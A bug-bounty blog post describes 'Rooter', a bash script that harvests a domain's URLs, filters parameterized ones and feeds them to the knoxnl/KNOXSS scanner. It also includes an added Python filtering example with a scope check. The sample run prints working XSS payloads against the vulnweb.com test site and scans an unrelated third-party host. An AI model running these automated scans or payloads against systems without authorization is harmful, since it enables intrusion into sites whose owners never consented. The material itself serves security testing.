XSS Automation Finding with Rooter
I’m Shubham Tiwari, and I’ve been actively involved in bug bounty hunting for quite some time. Along the way I was inspired to write an automation script that helps find XSS (Cross-Site Scripting) vulnerabilities. This blog post walks you step by step through using the ‘Rooter’ script to automate the discovery of XSS vulnerabilities.
Introduction: XSS Automation Script (‘Rooter’)
#!/bin/bash
echo -e "\033[1;36m"
figlet -f slant "Rooter"
echo -e "\033[0m"
# Check if a domain was provided as an argument
if [ -z "$1" ]; then
echo "Usage: $0 <domain>"
exit 1
fi
# Set the domain
domain="$1"
# Get all URLs from the domain using waybackurls
waybackurls "$domain" > all-urls.txt
echo "Finding URLs."
# Spider the URLs using gospider
# --blacklist is used to exclude certain file types
# --other-source is used to include other sources of URLs
# gospider prints one line per discovered URL in the form "[source] - [code-NNN] - URL",
# so its output is piped onward instead of being discarded
# Keep only the URLs that returned a "200 OK" status code (3rd field)
# Take the URL itself (5th field) and keep only those with query parameters
# qsreplace re-encodes each query string and prints every host+path+query combination once;
# -a appends the (here empty) replacement to each value instead of overwriting it, so values are kept
# Save the results to a file named xss.txt
gospider -S all-urls.txt -c 10 --blacklist "\.(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source \
| grep -e "code-200" | awk '{print $5}' | grep "=" | qsreplace -a > xss.txt
echo "Finding vulnerable Endpoint."
# Test the XSS vulnerabilities using knoxnl
echo "Attack Start."
knoxnl -i xss.txt
# Clean up by removing the all-urls.txt file
rm all-urls.txt
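The filtering stage of the script (keep 200 responses, keep only parameterized URLs, emit each parameter set once) is where most of the noise is removed, and the sample run below shows why a scope check belongs there too: waybackurls and gospider's other sources can return hosts that are not the target at all. This added example, which is not part of the Rooter script, reimplements that stage in Python over a constructed sample of gospider-style output lines and additionally drops any host outside the target domain. It deduplicates by host, path and sorted parameter names (stricter than the script's qsreplace -a, which also keeps values), so each parameter set reaches the scanner only once.

```python
from urllib.parse import urlsplit, parse_qsl

# Constructed sample of gospider output lines (not real scan output).
# Format per line: "[source] - [code-NNN] - URL"
SAMPLE_GOSPIDER_OUTPUT = """\
[url] - [code-200] - http://testphp.vulnweb.com/listproducts.php?cat=1
[url] - [code-200] - http://testphp.vulnweb.com/listproducts.php?cat=2
[url] - [code-404] - http://testphp.vulnweb.com/missing.php?id=5
[url] - [code-200] - http://testphp.vulnweb.com/index.php
[other-sources] - [code-200] - http://tracker.example-outofscope.invalid/?subid1=abc
[url] - [code-200] - http://testphp.vulnweb.com/showimage.php?file=1&size=160
[url] - [code-200] - http://testphp.vulnweb.com/showimage.php?size=100&file=2
"""


def in_scope(host, scope_domain):
    """True if host is the scope domain itself or one of its subdomains."""
    host = host.lower()
    scope_domain = scope_domain.lower()
    return host == scope_domain or host.endswith("." + scope_domain)


def select_parameterized_urls(gospider_output, scope_domain):
    """Filter gospider output the way the script's grep/awk/qsreplace stage does,
    plus an in-scope check. Returns the URLs to hand to the scanner, in order."""
    seen = set()
    keep = []
    for line in gospider_output.splitlines():
        fields = line.split()
        # Need at least "[source] - [code-NNN] - URL" and a 200 status
        if len(fields) < 5 or fields[2] != "[code-200]":
            continue
        url = fields[4]
        parts = urlsplit(url)
        host = parts.hostname or ""
        # Only URLs with a query string are candidates for reflected parameters
        if not parts.query or not in_scope(host, scope_domain):
            continue
        # Dedupe by host + path + parameter names, ignoring parameter values
        names = tuple(sorted(k for k, _ in parse_qsl(parts.query, keep_blank_values=True)))
        key = (host.lower(), parts.path, names)
        if key in seen:
            continue
        seen.add(key)
        keep.append(url)
    return keep


if __name__ == "__main__":
    for u in select_parameterized_urls(SAMPLE_GOSPIDER_OUTPUT, "vulnweb.com"):
        print(u)
```

On the sample above only two URLs survive: the 404, the URL without parameters, the out-of-scope host and the two parameter-set duplicates are all dropped.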
How to Use:
https://github.com/shubham-rooter/Xss-automation/
- Start using the script: paste the script into any text editor and save it as xss-automate.sh. Then, in the terminal, make the script executable with the command chmod +x xss-automate.sh.
- Find XSS URLs using the script: run the script with the command ./xss-automate.sh example.com, where example.com is your target domain. The script collects all URLs and then scans them using gospider.
- Find vulnerable endpoints: to detect XSS vulnerabilities, the script uses knoxnl. You'll find vulnerable endpoints in its output.
- Cleanup: after running the script, remove the all-urls.txt file, which is a temporary file containing the collected URLs (the script's final rm does this for you).
Example
┌──(rooter㉿rooter)-[~/Pictures/test]
└─$ ./xss-automate.sh vulnweb.com
(knoxnl ASCII-art banner)
by @Xnl-h4ck3r
Current knoxnl version 3.4 (outdated)
Calling KNOXSS API for 85 targets...
[ ERR! ] - (GET) http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault.asp%3F KNOXSS ERR: target connection issues (timeout) [Unknown]
[ XSS! ] - (GET) http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=1")'<!--><Svg OnLoad=(confirm)(1)<!-- [9/5000]
[ ERR! ] - (GET) http://testphp.vulnweb.com/showimage.php?file=%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Ealert%280x002C88%29%3C%2FscRipt%3E&size=160
[ SAFE ] - (GET) http://testphp.vulnweb.com/?channel= [11/5000]
[ ERR! ] - (GET) http://ww25.tinnongmoingay.com/?subid1=20240409-0334-05db-8109-abf21292199c KNOXSS ERR: The target website timed out [11/5000]
[ ERR! ] - (GET) http://testhtml5.vulnweb.com/ajax/latest?offset= KNOXSS ERR: target connection issues (timeout) [11/5000]
[ ERR! ] - (GET) http://testphp.vulnweb.com/?page_id= KNOXSS ERR: The target website timed out [11/5000]
That’s a simple guide to using the ‘Rooter’ script to find XSS vulnerabilities. Now you’re ready to automate your bug bounty hunting journey even further!
Connect with Shubham via:
- Email: shubhamrooter@gmail.com
- LinkedIn: https://www.linkedin.com/in/shubham-tiwari09
- Twitter: https://twitter.com/shubhamtiwari_r
Happy bug hunting! 🐞✨